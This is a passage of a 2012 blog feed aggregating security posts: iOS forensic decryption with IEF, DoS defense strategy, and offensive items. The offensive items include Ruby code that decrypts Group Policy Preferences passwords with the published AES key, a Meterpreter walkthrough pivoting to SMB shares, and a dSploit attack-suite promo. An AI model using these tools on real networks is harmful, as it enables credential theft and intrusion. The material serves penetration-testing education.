locks the device. Available in iOS 5.0 and later. Declared in NSFileManager.h. NSFileProtectionCompleteUntilFirstUserAuthentication The file is stored in an encrypted format on disk and cannot be accessed until after the device has booted. After the user unlocks the device for the first time, your app can access the file and continue to access it even if the user subsequently locks the device. Available in iOS 5.0 and later. Declared in NSFileManager.h. The default class for all files that are not otherwise assigned to a different data protection class is NSFileProtectionNone. This level uses individual keys for each file, but the keys are protected with a single system key so all the user data can be easily ‘erased’ during a reset (not really erased, it just deletes the system key and therefore the individual keys and data can never be recovered), but the key is easily viewed forensically since the system key can easily be obtained, without the need of the hardware key on the device itself. This level is not really meant to protect data, but rather provide a quick way to render data unreadable/unrecoverable. Each installed user application can dictate what class level to store the data generated by that application, but many use the default. The other levels of data protection incorporate the use of the hardware key that is unique for each particular device. This means that while you may be able to collect a physical image of an iPhone 4 or 5 and read the image file system, you cannot view unencrypted versions of the files themselves. If you have the device passcode and can obtain a file dump, you can however analyze the logical files, but will not be able to search unallocated. iOS Decryption with IEF 6.1.1 Internet Evidence Finder 6.1.1 introduced the ability to search an iOS image and files that may be protected with data encryption by providing the keys that are obtained by Cellebrite during the physical extraction process. IEF now looks for the associated .UFD file that the UFED creates during a physical extraction. The necessary keys are recorded in the .UFD file and IEF can now use those keys to decrypt data that is protected by only the system key. Loading an iOS image into Internet Evidence Finder Mobile phone support was added in IEF v6.1 and loading an image of an iOS device is very similar to loading an image of a hard drive. From the main splash screen, simple choose the “Mobile” option, iOS, then “Images”. You can point IEF directly to a bin, dmg or dd file. Loading a file dump into Internet Evidence Finder If you have obtained a logical file dump, you can follow the same steps as above, but instead choose the “File Dump” option and select the root folder that contains all the files you want to analyze. From this point you can continue to add more smartphone images, hard drive images or files you want to search before proceeding to the artifact selection page. Once completed, IEF will display all the found artifacts placed in their respective categories: Loading iOS backup files into Internet Evidence Finder iOS backup files are normally found on a computer hard drive. Therefore, to include iOS backup files in the artifact search, select the computer hard drive from the main “Images” option, then be sure and select the “iOS backups” option from the artifact selection screen: Summary Depending on how you have acquired data from the iOS device, you have three distinct options to analyze it with IEF. Physical Image (bin file from Cellebrite, DMG from Lantern or other ‘dd’ type image) Use IEF Advanced and choose the ‘iOS’->’Images’ option. If you used a Cellebrite UFED to extract the physical image and have the associated .UFD file, make sure it is in the same directory as the cellebrite physical image file (.bin) and IEF will automatically look for the .UFD file and use any keys that are present to decrypt user data. File Dump Use IEF Advanced and choose the ‘iOS’->’File Dump’ option, point IEF to the root of the file dump folder. iOS Backup Files Use IEF Standard or IEF Advanced and choose the ‘iOS Backup’ from the Mobile Backups artifact category. As always, I appreciate the feedback, comments or questions. You can reach me anytime at lance(at) magnetforensics(dot)com. Special thanks to Ryan Kubasiak from Blackbag Technologies for some of the detailed iOS encryption information and document references.</blockquote>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-68582261529229582372012-10-19T06:31:00.001-07:002012-10-19T06:31:42.646-07:00Group Policy Preferences and Getting Your Domain 0wned<a href="http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html">Group Policy Preferences and Getting Your Domain 0wned</a>: So i put this link out on twitter but forgot to put it on the blog.<br />
<br />
I did a talk at the Oct 20012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.<br />
<br />
I've run into this on a few tests where people are taking advantage of this exteremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)<br />
<br />
So here are the slides:<br />
<br />
<div style="margin-bottom: 5px;"><strong> <a href="http://www.slideshare.net/chrisgates/exploiting-group-policy-preferences" title="Exploiting Group Policy Preferences">Exploiting Group Policy Preferences</a> </strong> from <strong><a href="http://www.slideshare.net/chrisgates">chrisgates</a></strong> <br />
<br />
Blog post explaining the issue in detail:<br />
<a href="http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences">http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences</a><br />
<br />
Metasploit post module:<br />
<a href="http://metasploit.com/modules/post/windows/gather/credentials/gpp">http://metasploit.com/modules/post/windows/gather/credentials/gpp</a><br />
<br />
PowerShell module to do it:<br />
<a href="http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html">http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html</a><br />
<br />
I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. now you can do it yourself:<br />
<br />
<br />
<code><span style="font-family: Courier New,Courier,monospace;">require 'rubygems'</span><br />
<span style="font-family: Courier New,Courier,monospace;">require 'openssl'</span><br />
<span style="font-family: Courier New,Courier,monospace;">require 'base64'</span><br />
<span style="font-family: Courier New,Courier,monospace;"><br />
</span><span style="font-family: Courier New,Courier,monospace;"><br />
</span><span style="font-family: Courier New,Courier,monospace;">encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"</span><br />
<span style="font-family: Courier New,Courier,monospace;"><br />
</span><span style="font-family: Courier New,Courier,monospace;">def decrypt(encrypted_data)</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>padding = "=" * (4 - (encrypted_data.length % 4))</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>epassword = "#{encrypted_data}#{padding}"</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>decoded = Base64.decode64(epassword)</span><br />
<span style="font-family: Courier New,Courier,monospace;"><br />
</span><span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>aes.decrypt</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>aes.key = key</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>plaintext = aes.update(decoded)</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>plaintext << aes.final</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion</span><br />
<span style="font-family: Courier New,Courier,monospace;"><br />
</span><span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>return pass</span><br />
<span style="font-family: Courier New,Courier,monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="white-space: pre;"><span style="font-family: Courier New,Courier,monospace;"> </span></span><br />
<span style="font-family: Courier New,Courier,monospace;">blah = decrypt(encrypted_data)</span><br />
<span style="font-family: Courier New,Courier,monospace;">puts blah</span></code><br />
<code><span style="font-family: Courier New,Courier,monospace; font-size: x-small;"><br />
</span></code><code><span style="font-family: inherit;">In Action:</span></code><br />
<code><span style="font-family: Courier New,Courier,monospace; font-size: x-small;"></span></code><br />
<code><span style="font-family: Courier New,Courier,monospace;">user@ubuntu:~$ ruby gpp-decrypt-string.rb</span></code><br />
<code><span style="font-family: Courier New,Courier,monospace;">Local*P4ssword!</span></code><br />
<div><code><span style="font-family: Courier New,Courier,monospace; font-size: x-small;"><br />
</span></code></div></div><div><img alt="" height="1" src="https://blogger.googleusercontent.com/tracker/8539880144347728238-8886174710348831187?l=carnal0wnage.attackresearch.com" width="1" /></div>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-18598884241862678372012-10-18T06:36:00.001-07:002012-10-18T06:36:09.919-07:00DerbyCon 2012 - Security Vulnerability Assessments – Process and Best Practices<a href="http://feedproxy.google.com/~r/SecurityTube/~3/QrIEE92gq54/5940">DerbyCon 2012 - Security Vulnerability Assessments – Process and Best Practices</a>: Conducting regular security assessments on the organizational network and computer systems has become a vital part of protecting information-computing assets. Security assessments are a proactive and offensive posture towards information security as compared to the traditional reactive and defensive stance normally implemented with the use of Access Control-Lists (ACLs) and firewalls.<br />
<br />
Too effectively conduct a security assessment so it is beneficial to an organization, a proven methodology must be followed so the assessors and assesses are on the same page.<br />
<br />
This presentation will evaluate the benefits of credential scanning, scanning in a virtual environment, distributed scanning as well as vulnerability management.<br />
<br />
BIO:<br />
Kellep Charles (@kellepc) is the creator and Executive Editor of SecurityOrb.com (@SecurityOrb), an information security & privacy knowledge-based website with the mission to share and raise awareness of the motives, tools and tactics of the black-hat community, and provide best practices and counter measures against malicious events.<br />
Kellep works as a government contractor in the Washington, DC area as an Information Security Analyst with over 15 years of experience in the areas of incident response, computer forensics, security assessments, malware analyst and security operations.<br />
Currently he is completing his Doctorate in Information Assurance at Capitol College with a concentration in Artificial Neural Networks (ANN) and Human Computer Interaction (HCI). He also holds a Master of Science in Telecommunication Management from the University of Maryland University College and a Bachelor of Science in Computer Science from North Carolina Agriculture and Technical State University.<br />
<br />
He has served as an Adjunct Professor at Capitol College in their Computer Science department. His industry certifications include Certified Information Systems Security Professional (CISSP), Cisco Certified Network Associate (CCNA), Certified Information Systems Auditor (CISA), National Security Agency – INFOSEC Assessment Methodology (NSA-IAM) and Information Technology Infrastructure Library version 3 (ITILv3) to name a few.<img height="1" src="http://feeds.feedburner.com/~r/SecurityTube/~4/QrIEE92gq54" width="1" />Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-56383266074005160592012-10-18T06:34:00.001-07:002012-10-18T06:34:15.848-07:00Wigle Wifi Wardriving meets Google Earth for Neat Wifi MapsFirst take your handy dandy Android device and install <a href="https://play.google.com/store/apps/details?id=net.wigle.wigleandroid&hl=en" style="color: #1122cc; font-family: arial, sans-serif; white-space: nowrap;"><em style="font-style: normal; font-weight: bold;">Wigle</em><span style="color: #1122cc; font-family: arial,sans-serif;"> Wifi </span><em style="font-style: normal; font-weight: bold;">Wardriving</em></a>.<br />
<div><br />
</div><div>It uses the internal GPS and wifi to log access points, their security level and their GPS Position.</div><div><br />
</div><div>looks like this (yup i stole these)</div><div><br />
</div><div style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-RWcrZ4JcB0s/UHd9NlW-Z9I/AAAAAAAAA6E/B5Ax6NINvrg/s1600/droid-wigle-ap.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-RWcrZ4JcB0s/UHd9NlW-Z9I/AAAAAAAAA6E/B5Ax6NINvrg/s320/droid-wigle-ap.jpg" width="191" /></a></div><div style="clear: both; text-align: center;">List of access points</div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Of2F9Ab5iOg/UHd9TgXvE5I/AAAAAAAAA6M/bjmo5GkOkag/s1600/droid-wigle-map.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-Of2F9Ab5iOg/UHd9TgXvE5I/AAAAAAAAA6M/bjmo5GkOkag/s320/droid-wigle-map.jpg" width="191" /></a></div><div style="clear: both; text-align: center;">Also makes a cute map on your phone</div><div style="clear: both; text-align: left;"><br />
</div><div style="clear: both; text-align: left;">once you have the APs you can export out the "run" from the data section. yes yes, the stolen photo says "settings" but if you install it today it will say "data" there now.</div><div style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-clnYt_J4yXo/UHd9jg5QcbI/AAAAAAAAA6U/XOCV5t5-sDU/s1600/droid-wigle-kml.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-clnYt_J4yXo/UHd9jg5QcbI/AAAAAAAAA6U/XOCV5t5-sDU/s320/droid-wigle-kml.jpg" width="191" /></a></div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: left;">With the KML export you can import that directly into google earth and make all sorts of neat maps by toggling the data.</div><div style="clear: both; text-align: left;"><br />
</div><div style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-W_ZnVMKh4BY/UHd-X15PdtI/AAAAAAAAA6c/5gHMPbC5fOI/s1600/all-points.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="http://2.bp.blogspot.com/-W_ZnVMKh4BY/UHd-X15PdtI/AAAAAAAAA6c/5gHMPbC5fOI/s320/all-points.PNG" width="320" /></a></div><div style="clear: both; text-align: center;">All Access Points</div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-XbQ_ICM0nqI/UHd-nGGC6EI/AAAAAAAAA6k/-k5Zc_cbqsM/s1600/open-access-point.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="http://1.bp.blogspot.com/-XbQ_ICM0nqI/UHd-nGGC6EI/AAAAAAAAA6k/-k5Zc_cbqsM/s320/open-access-point.PNG" width="320" /></a></div><div style="clear: both; text-align: center;">Open Access Points</div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MMuQc2OCZ1c/UHd-xVw68jI/AAAAAAAAA6s/AJUBz7Tlgpo/s1600/wep-access-points.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-MMuQc2OCZ1c/UHd-xVw68jI/AAAAAAAAA6s/AJUBz7Tlgpo/s320/wep-access-points.PNG" width="319" /></a></div><div style="clear: both; text-align: center;">WEP Encrypted Access Points</div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: left;">That's it.</div><div style="clear: both; text-align: left;"><br />
</div><div style="clear: both; text-align: left;">-CG</div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: left;"><br />
</div><div style="clear: both; text-align: left;"><br />
</div><div><br />
</div><div><img alt="" height="1" src="https://blogger.googleusercontent.com/tracker/8539880144347728238-3102738446006211186?l=carnal0wnage.attackresearch.com" width="1" /></div>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-79095915549753736652012-10-18T06:30:00.001-07:002012-10-18T06:30:43.594-07:00Mounting SMB shares over Meterpreter<br />
Ok, this is pretty straight forward no magic:<br />
<img alt="Screen Shot 2012 10 17 at 11 00 16 AM" border="0" height="141" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.00.16%20AM.png?fileId=20660662" title="Screen Shot 2012-10-17 at 11.00.16 AM.png" width="416" /><br />
Got a shell, doesn't have to be SYSTEM<br />
<img alt="Screen Shot 2012 10 17 at 11 00 44 AM" border="0" height="54" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.00.44%20AM.png?fileId=20660663" title="Screen Shot 2012-10-17 at 11.00.44 AM.png" width="454" /><br />
Add a route to the internal range or directly to the host you want over the session you want<br />
<img alt="Screen Shot 2012 10 17 at 11 01 23 AM" border="0" height="197" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.01.23%20AM.png?fileId=20660664" title="Screen Shot 2012-10-17 at 11.01.23 AM.png" width="481" /><br />
Mosy on over to the Socks4a module. And in another terminal we need to make sure our proxychains.conf file in /etc/ or where ever you store your conf is correct.<br />
<img alt="Screen Shot 2012 10 17 at 10 52 29 AM" border="0" height="93" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2010.52.29%20AM.png?fileId=20660666" title="Screen Shot 2012-10-17 at 10.52.29 AM.png" width="184" /><br />
It defaults to 9050 on 127.0.01 for Tor, that's pretty easy to cope with and no reason to mess with it if you actually use it for Tor for other things.<br />
<img alt="Screen Shot 2012 10 17 at 11 03 00 AM" border="0" height="398" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.03.00%20AM.png?fileId=20660667" title="Screen Shot 2012-10-17 at 11.03.00 AM.png" width="456" /><br />
Run the socks proxy with the Tor-like settings. (Remember to shutdown Tor first)<br />
<img alt="Screen Shot 2012 10 17 at 11 04 34 AM" border="0" height="71" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.04.34%20AM.png?fileId=20660668" title="Screen Shot 2012-10-17 at 11.04.34 AM.png" width="600" /><br />
And the rest is gravy. The % (percent sign if blog software mangles it) is a delimiter that smbclient and other samba tools recognize between user and password (so it doesn't prompt you for it).<br />
And just to love it working:<br />
<img alt="Screen Shot 2012 10 17 at 11 04 53 AM" border="0" height="217" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.04.53%20AM.png?fileId=20660669" title="Screen Shot 2012-10-17 at 11.04.53 AM.png" width="600" /><br />
yay files.. Yes I know I didn't use smbmount but it works the same as well as rpcclient.<br />
A side note here is if you are using the pth-tools from:<br />
<a href="https://code.google.com/p/passing-the-hash/">https://code.google.com/p/passing-the-hash/</a><br />
You can use hashes instead of passwords for stuff like this. But who are we kidding? Who doesn't get clear text passwords anymore ;-)<br />
<div></div><img height="1" src="http://feeds.feedburner.com/~r/Room362com/~4/Ky9ASxuAeSE" width="1" />Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-65590217004687158722012-10-10T05:55:00.001-07:002012-10-10T05:55:14.567-07:00dSploit - An Android network penetration suite<a href="http://security-sh3ll.blogspot.com/2012/10/dsploit-android-network-penetration.html">dSploit - An Android network penetration suite</a>: <br />
<div style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-jmVNsegGtfA/UHUuQ_TA9nI/AAAAAAAABFM/tZ84a4HcTps/s1600/8.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="112" src="http://3.bp.blogspot.com/-jmVNsegGtfA/UHUuQ_TA9nI/AAAAAAAABFM/tZ84a4HcTps/s200/8.png" width="200" /></a></div><i><a href="https://github.com/evilsocket/dsploit">dSploit</a> is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks<br />
</i><b><i>the most complete and advanced professional toolkit</i></b><i> to perform network security assesments on a mobile device.</i><br />
<br />
<i><br />
<br />
</i><br />
<br />
<i>Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems<br />
and running services, search for </i><b><i>known vulnerabilities</i></b><i>, crack logon procedures of many tcp protocols, perform<br />
man in the middle attacks such as </i><b><i>password sniffing</i></b><i> ( with common protocols dissection ), real time </i><b><i>traffic<br />
manipulation</i></b><i>, etc, etc .</i><br />
<br />
<i><br />
<br />
</i><br />
<br />
<i>This application is still in </i><b><i>beta stage</i></b><i>, a stable release will be available as soon as possible, but expect<br />
some crash or strange behaviour until then, in any case, feel free to submit an issue here on GitHub.</i><br />
<br />
<h2><span style="font-size: small;">Requirements:</span></h2><ul><li><i>An Android device with at least the 2.3 ( Gingerbread ) version of the OS.</i></li>
<i> </i>
<li><i>The device </i><b><i>must be rooted</i></b><i>.</i></li>
<i> </i>
<li><i>The device must have a BusyBox </i><b><i>full install</i></b><i>, this means with </i><b><i>every</i></b><i> utility installed ( not the partial installation ). </i></li>
</ul><b>Available Modules</b><br />
<br />
<br />
<br />
<ul><li><b>RouterPWN</b><br />
<br />
<i>Launch the <a href="http://routerpwn.com/" rel="nofollow">http://routerpwn.com/</a> service to pwn your router.</i></li>
<li><b>Port Scanner</b><br />
<br />
<i>A syn port scanner to find quickly open ports on a single target.</i></li>
<li><b>Inspector</b><br />
<br />
<i>Performs target operating system and services deep detection, slower than syn port scanner but more accurate.</i></li>
<li><b>Vulnerability Finder</b><br />
<br />
<i>Search for known vulnerabilities for target running services upon National Vulnerability Database.</i></li>
<li><b>Login Cracker</b><br />
<br />
<i>A very fast network logon cracker which supports many different services.</i></li>
<li><b>Packet Forger</b><br />
<br />
<i>Craft and send a custom TCP or UDP packet to the target.</i></li>
<li><b>MITM</b> <br />
<br />
<i>A set of man-in-the-middle tools to command&conquer the whole network . </i></li>
</ul><br />
<br />
<b>Download: <a href="https://github.com/evilsocket/dsploit/downloads">https://github.com</a></b><br />
<br />
<ul></ul><div><img alt="" height="1" src="https://blogger.googleusercontent.com/tracker/232798662055846003-6930027691667847877?l=security-sh3ll.blogspot.com" width="1" /></div>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-87411826516672063712012-10-10T05:53:00.001-07:002012-10-10T05:53:31.526-07:00Defending Against DoS Attacks: Defense Part 1, the Network<a href="https://securosis.com/blog/defending-against-dos-attacks-defense-part-1-the-network">Defending Against DoS Attacks: Defense Part 1, the Network</a>: <br />
In <a href="https://securosis.com/blog/defending-against-dos-attacks-the-attacks">Attacks</a>, we discussed both network-based and application-targeting Denial of Service (DoS) attacks. Given the radically different techniques between the types, it’s only logical that we use different defense strategies for each type. But be aware that aspects of both network-based and application-targeting DoS attacks are typically combined for maximum effect. So your DoS defenses need to be comprehensive, protecting against (aspects of) both types. Anti-DoS products and services you will consider defend against both. This post will focus on defending against network-based volumetric attacks.<br />
<br />
First the obvious: you cannot just throw bandwidth at the problem. Your adversaries likely have an unbounded number of bots at their disposal and are getting smarter at using shared virtual servers and cloud instances to magnify the amount of evil bandwidth at their disposal. So you can’t just hunker down and ride it out. They likely have a bigger cannon than you can handle. You need to figure out how to deal with a massive amount of traffic and separate good traffic from bad, while maintaining availability. Find a way to dump bad traffic before it hoses you somehow without throwing the baby (legitimate application traffic) out with the bathwater.<br />
<br />
We need to be clear about the volume we are talking about. Recent attacks have blasted upwards of 80-100gbps of network traffic at targets. Unless you run a peering point or some other network-based service, you probably don’t have that kind of inbound bandwidth. Keep in mind that even if you have big enough pipes, the weak link may be the network security devices connected to them. Successful DoS attacks frequently target network security devices and overwhelm their session management capabilities. Your huge expensive IPS might be able to handle 80gbps of traffic in ideal circumstances, but fall over due to session table overflow. Even if you could get a huge check to deploy another network security device in front of your ingress firewall to handle that much traffic, it’s probably not the right device for the job.<br />
<br />
Before you just call up your favorite anti-DoS service provider, ISP, or content delivery network (CDN) and ask them to scrub your traffic, that approach is no silver bullet either. It’s not like you can just flip a switch and have all your traffic instantly go through a scrubbing center. Redirecting traffic incurs latency, assuming you can even communicate with the scrubbing center (remember, your pipes are overwhelmed with attack traffic). Attackers choose a mix of network and application attacks based on what’s most effective in light of your mitigations.<br />
<br />
No, we aren’t only going to talk about more problems, but it’s important to keep everything in context. Security is not a problem you can ever <em>solve</em> – it’s about figuring out how much loss you can accept. If a few hours of downtime is fine, then you can do certain things to ensure you are back up within that timeframe. If <em>no</em> downtime is acceptable you will need a different approach. There are no right answers – just a series of trade-offs to manage to the availability requirements of your business, within the constraints of your funding and available expertise.<br />
<br />
Handling network-based attacks involves mixing and matching a number of different architectural constructs, involving both customer premise devices and network-based service offerings. Many vendors and service providers can mix and match between several offerings, so we don’t have a set of vendors to consider here. But the discussion illustrates how the different defenses play together to blunt an attack.<br />
<br />
<h2>Customer Premise-based Devices</h2><br />
The first category of defenses is based around a device on the customer premises. These appliances are purpose-built to deal with DoS attacks. Before you turn your nose up at the idea of installing another box to solve such a specific problem, take another look at your perimeter. There is a reason you have all sorts of different devices. The existing devices already in your perimeter aren’t particularly well-suited to dealing with DoS attacks. As we mentioned, your IPS, firewall, and load balancers aren’t designed to manage an extreme number of sessions, nor are they particularly adept at dealing with obfuscated attack traffic which looks legitimate. Nor can other devices integrate with network providers (to automatically change network routes, which we will discuss later) – or include out-of-the-box DoS mitigation rules, dashboards, or forensics, built specifically to provide the information you need to ensure availability under duress.<br />
<br />
So a new category of DoS mitigation devices has emerged to deal with these attacks. They tend to include both optimized IPS-like rules to prevent floods and other network anomalies, and simple web application firewall capabilities which we will discuss in the next post. Additionally, we see a number of anti-DoS features such as session scalability, combined with embedded IP reputation capabilities, to discard traffic from known bots without full inspection. To understand the role of IP reputation, let’s recall how email connection management devices enabled anti-spam gateways to scale up to handle spam floods. It’s computationally expensive to fully inspect every inbound email, so dumping messages from known bad senders first enables inspection to focus on email that might be legitimate, and keeps mail flowing. The same methodology applies here.<br />
<br />
These devices should be as close to the perimeter as possible, to get rid of the maximum amount of traffic before the attack impacts anything else. Some devices can be deployed out-of-band as well, to monitor network traffic and pinpoint attacks. Obviously monitor-and-alert mode is less useful than blocking, which helps maintain availability in real time. And of course you will want a high-availability deployment – an outage due to a failed security device is likely to be even more embarrassing than simply succumbing to a DoS.<br />
<br />
But anti-DoS devices include their own limitations. First and foremost is the simple fact that if your pipes are overwhelmed, a device on your premises is irrelevant. Additionally, SSL attacks are increasing in frequency. It’s cheap for an army of bots to use SSL to encrypt all their attack traffic, but expensive for a network security device to terminate all SSL sessions and check all their payloads for attacks. That kind of computational cost arbitrage puts defenders in a world of hurt. Even load balancers, which are designed to terminate high SSL volumes, can face challenges dealing with SSL DoS attacks, due to session management limitations.<br />
<br />
So an anti-DoS device needs to integrate a number of existing capabilities such as IPS, network behavioral analysis, WAF, and SSL termination, combining them with highly scalable session management to cope with DoS attacks. And all that is still not enough – you will always be limited by the amount of bandwidth coming into your site. That brings us to network services, as a compliment to premise-based devices.<br />
<br />
<h2>Proxies & CDN</h2><br />
The first service option most organizations consider is a Content Delivery Network (CDN). These services enhance web site performance by strategically caching content. Depending on the nature of your site, a CDN might be able to dramatically reduce your ingress network traffic – if they can cache much of your static content. They also offer some security capabilities, especially for dealing with DoS attacks. The CDN acts as a proxy for your web site, so the provider can protect your site by using its own massive bandwidth to cope with DoS attacks for you. They have significant global networks, so even a fairly large volumetric attack shouldn’t look much different than a busy customer day – say a software company patching an operating system for a hundred million customers. Their scale enables them to cope with much larger traffic onslaughts than your much smaller pipes. Another advantage of a CDN is its ability to obscure the real IP addresses of your site, making it more difficult for attackers to target your servers. CDNs can also handle SSL termination if you allow them to store your private keys.<br />
<br />
What’s the downside? Protecting each site individually. If one site is <em>not</em> running through the CDN, attackers can find it through some simple reconnaisance and blast the vulnerable site. Even for sites running through the CDN, if attackers can find your controlling IPs they can you directly, bypassing the CDN. Then you need to mitigate the attack directly. Attackers also can randomize web page and image requests, forcing the CDN to request what it thinks is dynamic content directly from your servers over and over again. These cache misses can effectively cause the CDN to attack your servers. Obviously you want the CDN to be smart enough to detect these attacks before they melt your pipes and servers.<br />
<br />
Also be wary of excessive bandwidth costs. At the low end of the market, CDNs charge a flat fee and just eat the bandwidth costs if a small site is attacked. But enterprise deals are a bit more involved, charging for both bandwidth and protection. A DoS attack can explode bandwidth costs, causing an “economic DoS”, and perhaps shutting down the site when the maximum threshold (by contract or credit card limit) is reached. When setting up contracts, make sure you get some kind of protection from excessive bandwidth charges in case of attack.<br />
<br />
<h2>Anti-DoS Service Providers</h2><br />
CDN limitations require some organizations to consider more focused network-based anti-DoS service providers. These folks run <em>scrubbing centers</em> – big data centers with lots of anti-DoS mitigation gear to process inbound floods and keep sites available. You basically flip a switch to send your traffic through the scrubbing center once you detect an attack. This switch usually controls BGP routing, so as soon as DNS updates and the network converge the scrubbing center handles all inbound traffic. On the backend you receive legitimate traffic through a direct connection – GRE tunnels to leverage the Internet, or a dedicated network link from the scrubbing center. Obviously there is latency during redirection, so keep that in mind.<br />
<br />
But what does a scrubbing center actually do? The same type of analysis as a premise-based device. The scrubbing center manages sessions, drops traffic based on network telemetry and IP reputation, blocks application-oriented attacks, and otherwise keeps your site up and available. Most scrubbing centers have substantial anti-DoS equipment footprints, amortized across all their customers. You pay for what you need, when you need it, rather than overprovisioning your network and buying a bunch of anti-DoS equipment for whenever you are actually attacked.<br />
<br />
Getting back to our email security analogy, think of an anti-DoS service provider like an cloud email security service. Back in the early days of spam, most organizations implemented their own email security gateways to deal with spam. When the inbound volume of email overwhelmed the gateways, organizations had to deploy more gateways and email filter hardware. This made anti-spam gateways a good business, until a few service providers started selling cloud services to deal with the issue. Just route your mail through their networks, and only good stuff would actually get delivered to your email servers. Spam flood? No problem – it’s the provider’s problem. Obviously there are differences – particularly that email filtering is full-time, while DoS filtering is on-demand during attacks.<br />
<br />
There are, of course, issues with this type of service, aside from the inevitable latency, which causes disruption while you reroute traffic to the scrubbing center. Scrubbing centers have the same SSL requirement as CDNs: termination requires access to your private key. Depending on your security tolerance, this could be a serious problem. Many large sites have tons of certificates and can-cross sign keys for the scrubbing center, but it does complicate management of the service provider.<br />
<br />
You will also need to spell out a process for determining when to redirect traffic. We will talk about this more when we go through the DoS defense process, but it generally involves an internal workflow to detect emerging attacks, evaluation of the situation, and then a determination to move the traffic – typically rerouting via BGP. But if your anti-DoS provider uses the same equipment as you have on-site, that might offer proprietary signaling protocols to automatically shift traffic based on thresholds. Though some network operations folks don’t enjoy letting Skynet redirect their traffic through different networks. What could possibly go wrong with that?<br />
<br />
Selection of an anti-DoS service provider is a serious decision. We recommend a fairly formal procurement process, which enables you to understand the provider’s technical underpinnings, network architecture, available bandwidth, geographic distribution, ability to handle SSL attacks, underlying anti-DoS equipment, and support for various signaling protocols. Make sure you are comfortable with the robustness of their DNS infrastructure, because DNS is a popular target and critical to several defenses. Also pay close attention to process hand-offs, responsiveness of their support group, and their research capabilities (to track attackers and mitigate specific attacks).<br />
<br />
<h2>The Answer: All of the Above</h2><br />
